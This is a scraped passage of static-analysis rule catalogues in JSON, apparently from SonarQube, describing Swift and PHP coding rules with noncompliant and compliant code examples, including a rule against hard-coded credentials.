<\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"BUG"},{"key":"swift:S1996","repo":"swift","name":"Types should be defined in separate source files","htmlDesc":"<p>A file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to maintain. This\nis doubly true for a file with multiple independent classes, extensions, protocols, enumerations or structures. It is strongly advised to define each\nindividual type in separate source file.<\/p>\n<h2>Exceptions<\/h2>\n<p>The case when file contains only class and its extensions is ignored.<\/p>\n<pre>\nclass MyViewController: UIViewController {\n \/\/ class stuff here\n}\n\nextension MyViewController: UITableViewDataSource {\n \/\/ table view data source methods\n}\n\nextension MyViewController: UIScrollViewDelegate {\n \/\/ scroll view delegate methods\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2007","repo":"swift","name":"Functions and variables should not be defined outside of classes","htmlDesc":"<p>Defining and using global variables and global functions, when the convention dictates OOP can be confusing and difficult to use properly for\nmultiple reasons:<\/p>\n<ul>\n <li> You run the risk of name clashes. <\/li>\n <li> Global functions must be stateless, or they can cause difficult-to-track bugs. <\/li>\n <li> Global variables can be updated from anywhere and may no longer hold the value you expect. <\/li>\n <li> It is difficult to properly test classes that use global functions. <\/li>\n<\/ul>\n<p>Instead of being declared globally, such variables and functions should be moved into a class, potentially marked <code>static<\/code>, so they can\nbe used without a class instance. <\/p>\n<p>This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar name = \"Bob\" \/\/ Noncompliant\n\nfunc doSomething() { \/\/ Noncompliant\n \/\/...\n}\n\nclass MyClass {\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class MyClass {\n public static var name = \"Bob\"\n\n public class func doSomething() { \/\/ Compliant\n \/\/...\n }\n \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The operator function is a function with a name that matches the operator to be overloaded. Because such functions can only be defined in a global\nscope, they are ignored by this rule.<\/p>\n<pre>\npublic class Vector2D {\n var x = 0.0, y = 0.0\n \/\/ ...\n}\n\nfunc + (left: Vector2D, right: Vector2D) -> Vector2D {\n return Vector2D(x: left.x + right.x, y: left.y + right.y)\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2068","repo":"swift","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code in a strongly-protected encrypted configuration file or database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar post:NSString = \"username=Steve&password=123456\" \/\/ Noncompliant\nvar postData:NSData = post.dataUsingEncoding(NSASCIIStringEncoding)!\n\/\/...\nvar request:NSMutableURLRequest = NSMutableURLRequest(URL: url)\nrequest.HTTPBody = postData\n\/\/...\nvar urlData: NSData? = NSURLConnection.sendSynchronousRequest(request, returningResponse:&response, error:&reponseError)\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar post:NSString = \"username=\\(getEncryptedUser())&password=\\(getEncryptedPass())\"\nvar postData:NSData = post.dataUsingEncoding(NSASCIIStringEncoding)!\n\/\/...\nvar request:NSMutableURLRequest = NSMutableURLRequest(URL: url)\nrequest.HTTPBody = postData\n\/\/...\nvar urlData: NSData? = NSURLConnection.sendSynchronousRequest(request, returningResponse:&response, error:&reponseError)\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n Broken Authentication and Session Management <\/li>\n <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"VULNERABILITY"},{"key":"swift:S2108","repo":"swift","name":"Fields and variables that are never updated should be constant","htmlDesc":"<p>Variables that are never updated will always return their default values and so they should be explicitly declared as constant. A\n<code>let<\/code>-declaration guarantees and clearly signals to the programmer that its value is supposed to and will never change.<\/p>\n<p>This rule applies to non-constant fields and variables which are not set within the codebase.<\/p>","status":"READY","tags":["rank1"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2197","repo":"swift","name":"Modulus results should not be checked for direct equality","htmlDesc":"<p>When the modulus of a negative number is calculated, the result will either be negative or zero. Thus, comparing the modulus of a variable for\nequality with a positive number (or a negative one) could result in unexpected results. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunc isOdd(x:Int) -> Bool {\n return x % 2 == 1 \/\/ Noncompliant; if x is negative, x % 2 == -1\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunc isOdd(x:Int) -> Bool {\n return x % 2 != 0\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nfunc isOdd(x:Int) -> Bool {\n return abs(x % 2) == 1\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/xAHAAQ\">CERT, NUM51-J.<\/a> - Do not assume that the remainder operator always returns a\n nonnegative result for integral operands <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NQBi\">CERT, INT10-C<\/a> - Do not assume a positive remainder when using the % operator\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/_YBLAQ\">CERT, INT10-CPP.<\/a> - Do not assume a positive remainder when using the %\n operator <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2342","repo":"swift","name":"Enumeration types should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all <code>enum<\/code> names match a provided regular\nexpression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[A-Z][a-zA-Z0-9]*<\/code><\/p>\n<pre>\nenum someEnumeration { \/\/ Non-Compliant\n case Bar\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nenum SomeEnumeration {\n case Bar\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Swift","params":[{"key":"format","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"swift:S2343","repo":"swift","name":"Enumeration members should comply with a naming convention","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. This rule checks that all enumeration member names match a provided regular\nexpression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[a-z][a-zA-Z0-9]*$<\/code><\/p>\n<pre>\nenum SomeEnumeration {\n case SomeMember \/\/ Non-Compliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nenum SomeEnumeration {\n case someMember\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Swift","params":[{"key":"format","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"swift:S2523","repo":"swift","name":"Comments should not be nested","htmlDesc":"<p>Nested comments are confusing and can lead maintainers to misunderstand which code is active.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/*\n This is a comment block.\n It may be difficult to figure out that the following line of code is actually commented\n\n\nvariable = function_call();\n\/* variable contains the result. Noncompliant; inner comment *\/\n*\/\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 2.3 - The character sequence \/* shall not be used within a comment. <\/li>\n <li> MISRA C++:2008, 2-7-1 - The character sequence \/* shall not be used within a C-style comment. <\/li>\n <li> MISRA C:2012, 3.1 - The character sequences \/* and \/\/ shall not be used within a comment <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/L4IyAQ\">CERT, MSC04-CPP.<\/a> - Use comments consistently and in a readable fashion\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KgQ\">CERT, MSC04-C.<\/a> - Use comments consistently and in a readable fashion <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2950","repo":"swift","name":"Access control should be specified for top-level definitions","htmlDesc":"<p>The access level defaults to <code>internal<\/code> if left unspecified. Since that doesn't make sense for most top-level declarations, access\nlevels should always be specified explicitly, even when <code>internal<\/code> is what's intended.<\/p>\n<p>This rule raises an issue when the access level is not specified on any top-level declaration.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic class Foo {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"VULNERABILITY"},{"key":"swift:S2951","repo":"swift","name":"\"break\" should be the only statement in a \"case\"","htmlDesc":"<p>Because <code>case<\/code> statements in a Swift <code>switch<\/code> do not fall through, there is no need to use <code>break<\/code> at the end of a\n<code>case<\/code> unless it would otherwise be empty. Since an empty <code>case<\/code> isn't allowed, an explicit <code>break<\/code> is needed to make\nsuch code compilable. There is no other reason to use <code>break<\/code> in a <code>case<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch weekday {\n case sunday:\n break\n case monday:\n getUpEarly()\n break \/\/ Noncompliant\n case tuesday\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch weekday {\n case sunday:\n break\n case monday:\n getUpEarly()\n case tuesday\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2957","repo":"swift","name":"\"return\" should be omitted from single-expression closures","htmlDesc":"<p>When a closure contains only a <code>return<\/code> statement, the <code>return<\/code> itself can be omitted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nsomeList.sort { a, b in\n return a > b\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nsomeList.sort { a, b in a > b }\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2958","repo":"swift","name":"Trailing closure syntax should not be used when multiple parameters are of function type","htmlDesc":"<p>Using trailing closure syntax for the last parameter in a call is often the most elegant way to handle it. But if the call requires multiple\nfunction-type arguments, the use of a trailing closure can be messy and confusing. In such cases, it's better to pass closure expressions as normal\narguments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = complexOperation(\n arg: 2,\n op1: {$0 + 10}\n) {$0 * $0}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = complexOperation(\n arg: 2,\n op1: {$0 + 10},\n op2: {$0 * $0}\n)\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2959","repo":"swift","name":"Statements should not end with semicolons","htmlDesc":"<p>The semicolon (<code>;<\/code>) is optional as a statement separator except in traditional <code>for<\/code> loops and when several statements are\ncombined on one line (which is a bad practice). For cleaner code, semicolons should be omitted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nint a; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nint a\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2960","repo":"swift","name":"Operators should be surrounded by whitespace in function definitions","htmlDesc":"<p>Surrounding your operators with whitespace in operator declarations will help maintainers derive meaning from what might otherwise look like a\nmeaningless jumble of punctuation.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunc <*>(a: MyClass, b: MyClass) -> Boolean { \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunc <*> (a: MyClass, b: MyClass) -> Boolean {\n<\/pre>","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2962","repo":"swift","name":"\"get\" should be omitted in read-only computed properties and subscripts","htmlDesc":"<p>For read-only computed properties and subscript declarations, the <code>get<\/code> keyword and its braces are optional, and should be omitted for\nthe sake of brevity.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstruct Magic {\n var number:Int {\n get { \/\/ Noncompliant\n return 42\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstruct Magic {\n var number:Int {\n return 42\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2963","repo":"swift","name":"\"self\" should only be used when required","htmlDesc":"<p>The use of <code>self<\/code> is optional except when in closure expressions, and when it's needed to distinguish between property names and\narguments. For the sake of brevity, <code>self<\/code> should be omitted when it's not strictly required.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Car {\n var color: Int\n\n init(color: Int) {\n self.color = color\n }\n\n func fade() {\n self.color-- \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Car {\n var color: Int\n\n init(color: Int) {\n self.color = color\n }\n\n func fade() {\n color--\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S2966","repo":"swift","name":"Optionals should not be force-unwrapped","htmlDesc":"<p>The point of declaring an optional variable is to make explicit the fact that it might contain no valid value, i.e. <code>nil<\/code>.\nForce-unwrapping an optional will lead to a runtime error if the optional does contain <code>nil<\/code>. Even if the value is tested first, it's still\nconsidered a bad practice to use force-unwrapping. Instead, optional binding or optional chaining should be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar greeting: String?\n\n\/\/ ...\nprintln( \\(greeting!)) \/\/ Noncompliant; could cause a runtime error\n\nif greeting != nil {\n println( \\(greeting!)) \/\/ Noncompliant; better but still not great\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar greeting: String?\n\n\/\/ ...\nif let howdy = greeting {\n println(howdy)\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Swift","params":[],"type":"BUG"},{"key":"swift:S2967","repo":"swift","name":"Implicitly unwrapped optionals should not be used","htmlDesc":"<p>The point of using an optional is to signal that the value may be <code>nil<\/code> and to provide graceful ways of dealing with it if it is\n<code>nil<\/code>. While implicitly unwrapped optionals still provide means of dealing with <code>nil<\/code> values, they also signal that the value\nwon't be <code>nil<\/code>, and unwrap it automatically. In addition to sending a decidedly mixed signal, this could lead to runtime errors if the\nvalue ever is <code>nil<\/code>. <\/p>\n<p>It is safest, and clearest to use either an optional or a plain type and avoid the boggy middle ground of implicitly unwrapped optionals.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar greeting : String! \/\/ Noncompliant\n\nprintln(greeting) \/\/ At this point the value is nil. Runtime error results\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar greeting : String?\n\nif let howdy = greeting {\n println(howdy)\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Swift","params":[],"type":"BUG"},{"key":"swift:S2968","repo":"swift","name":"Function type parameters should come at the end of the parameter list","htmlDesc":"<p>Trailing closure syntax can only be used with the last argument to a function call. Place a function type parameter anywhere else in the list and\nyou limit the options of the caller.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunc foo(p1: Int->Int, p2: Int){ \/\/ Noncompliant; p1 should come at the end\n print(p1(p2))\n}\n\nfoo({a in a * 2}, 42) \/\/ Trailing closure syntax can't be used here\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunc foo(p2: Int, p1: Int->Int){\n print(p1(p2))\n}\n\nfoo(42) {a in a * 2}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"Swift","params":[],"type":"CODE_SMELL"},{"key":"swift:S3087","repo":"swift","name":"Closure expressions should not be nested too deeply","htmlDesc":"<p>The point of using closure expressions is to clearly express a succinct bit of logic. Start nesting closure expressions too deeply and you create a\nlogic snarl that will likely snare both you and future maintainers.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the maximum depth of 2:<\/p>\n<pre>\nfoo(42) { (x: Int) in\n bar(x) { (x: Int) in\n foobar(x) { \/\/ Noncompliant\n print(x * 42)\n }\n print(x + 42)\n }\n print(x - 42)\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunc multPlus(x:Int) {\n foobar(x) {\n print(x * 42)\n }\n print(x + 42)\n}\n\nfoo(42) { (x: Int) in\n bar(x, multPlus)\n print(x - 42)\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Swift","params":[{"key":"max","htmlDesc":"The maximum allowed closure expressions nesting depth.","defaultValue":"2","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"swift:S3110","repo":"swift","name":"Infix operators that end with \"=\" should update their left operands","htmlDesc":"<p>The conventional expectation of operators that end with <code>=<\/code>, such as <code>+=<\/code>, <code>-=<\/code>, <code>*=<\/code>, and so on, is\nthat the result of the operation will be assigned to the operand on the left-hand side of the operator.<\/p>\n<p>Define any other behavior and you almost guarantee that the users of your code will misunderstand and therefore misuse your operator.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunc **= (p1:Int, p2:Int) -> Int { \/\/ Noncompliant. Change operator name or update value of first parameter\n return p1 ** p2\n}\n\nfunc => (p1:Int, p2:Int) -> Int { \/\/ Compliant; doesn't end with '='\n return p1 ** p1 ** p2\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunc **= (inout p1:Int, p2:Int) {\n p1 = p1 ** p2\n}\n\nfunc => (p1:Int, p2:Int) -> Int {\n return p1 ** p1 ** p2\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"BUG"},{"key":"swift:S3111","repo":"swift","name":"Conditional compilation should not be used","htmlDesc":"<p>Conditional compilation is generally recognized as a bad practice that is occasionally necessary when dealing with platform-specific code. As much\nas possible, code should be refactored to minimize or eliminate conditionally-compiled, platform-specific code because even when necessary and\nwell-intentioned, such code segments can leave your codebase in a hopeless tangle.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n#if os(OSX) \/\/ Noncompliant\n let a = 2\n#else\n let a = 3\n#endif\n<\/pre>","status":"READY","tags":["rank5"],"langName":"Swift","params":[],"type":"CODE_SMELL"}],"language":"swift","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};- Exclude checks
BUG found Open
Open
window.data = {"total":112,"p":1,"ps":500,"rules":[{"key":"common-php:DuplicatedBlocks","repo":"common-php","name":"Source files should not have any duplicated blocks","htmlDesc":"An issue is created on a file as soon as there is at least one block of duplicated code on this file","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"common-php:FailedUnitTests","repo":"common-php","name":"Failed unit tests should be fixed","htmlDesc":"Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"common-php:InsufficientCommentDensity","repo":"common-php","name":"Source files should have a sufficient density of comment lines","htmlDesc":"An issue is created on a file as soon as the density of comment lines on this file is less than the required threshold. The number of comment lines to be written in order to reach the required threshold is provided by each issue message.","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"minimumCommentDensity","defaultValue":"25","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:InsufficientLineCoverage","repo":"common-php","name":"Lines should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the line coverage on this file is less than the required threshold. It gives the number of lines to be covered in order to reach the required threshold.","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"minimumLineCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:SkippedUnitTests","repo":"common-php","name":"Skipped unit tests should be either removed or fixed","htmlDesc":"Skipped unit tests are considered as dead code. Either they should be activated again (and updated) or they should be removed.","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S100","repo":"php","name":"Function names should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all function names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[a-z][_a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nfunction DoSomething(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(){...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Methods with an <code>@inheritdoc<\/code> annotation, as well as magic methods (<code>__construct()<\/code>, <code>__destruct()<\/code>,\n<code>__call()<\/code>, <code>__callStatic()<\/code>, <code>__get()<\/code>, <code>__set()<\/code>, <code>__isset()<\/code>, <code>__unset()<\/code>,\n<code>__sleep()<\/code>, <code>__wakeup()<\/code>, <code>__toString()<\/code>, <code>__invoke()<\/code>, <code>__set_state()<\/code>,\n<code>__clone()<\/code>, <code>__debugInfo()<\/code>) are ignored.<\/p>\n<pre>\nfunction __construct(){...}\nfunction __destruct(){...}\n\n\/**\n * {@inheritdoc}\n *\/\nfunction myFunc(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the function names against","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S101","repo":"php","name":"Class names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that all class\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass my_class {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the class names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S103","repo":"php","name":"Lines should not be too long","htmlDesc":"<p>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.<\/p>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"maximumLineLength","htmlDesc":"The maximum authorized line length.","defaultValue":"120","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S105","repo":"php","name":"Tabulation characters should not be used","htmlDesc":"<p>Developers should not need to configure the tab width of their text editors in order to be able to read source code.<\/p>\n<p>So the use of tabulation character must be banned.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1066","repo":"php","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n if (condition2) {\n ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1 && condition2) {\n ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1067","repo":"php","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&&<\/code>, <code>||<\/code> and <code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold value of 3<\/p>\n<pre>\nif ((($condition1 && $condition2) || ($condition3 && $condition4)) && $condition5) { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ( (my_first_condition() || my_second_condition()) && my_last_condition()) { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1068","repo":"php","name":"Unused \"private\" fields should be removed","htmlDesc":"<p>If a <code>private<\/code> field is declared but not used in the program, it can be considered dead code and should therefore be removed. This will\nimprove maintainability because developers will not wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass {\n private $foo = 4; \/\/foo is unused\n\n public function compute($a) {\n return $a * 4;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n\n public function compute($a) {\n return $a * 4;\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S107","repo":"php","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4, $param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"},{"key":"constructorMax","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S108","repo":"php","name":"Nested blocks of code should not be left empty","htmlDesc":"<p>Most of the time a block of code is empty when a piece of code is really missing. So such empty block must be either filled or removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i < 42; $i++){} \/\/ Empty on purpose or missing piece of code ?\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a block contains a comment, this block is not considered to be empty.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1105","repo":"php","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition)\n{\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (left and right curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1109","repo":"php","name":"A close curly brace should be located at the beginning of a line","htmlDesc":"<p>Shared coding conventions make it possible for a team to efficiently collaborate. This rule makes it mandatory to place a close curly brace at the\nbeginning of a line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition) {\n doSomething();}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (open and close curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1116","repo":"php","name":"Empty statements should be removed","htmlDesc":"<p>Empty statements, i.e. <code>;<\/code>, are usually introduced by mistake, for example because:<\/p>\n<ul>\n <li> It was meant to be replaced by an actual statement, but this was forgotten. <\/li>\n <li> There was a typo which lead the semicolon to be doubled, i.e. <code>;;<\/code>. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n ; \/\/ Noncompliant - was used as a kind of TODO marker\n}\n\nfunction doSomethingElse($p) {\n echo $p;; \/\/ Noncompliant - double ;\n}\n\nfor ($i = 1; $i <= 10; doSomething($i), $i++); \/\/ Noncompliant - Rarely, they are used on purpose as the body of a loop. It is a bad practice to have side-effects outside of the loop body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething() {}\n\nfunction doSomethingElse($p) {\n echo $p;\n\n for ($i = 1; $i <= 10; $i++) {\n doSomething($i);\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment provided that\n the first character following the null statement is a white-space character. <\/li>\n <li> 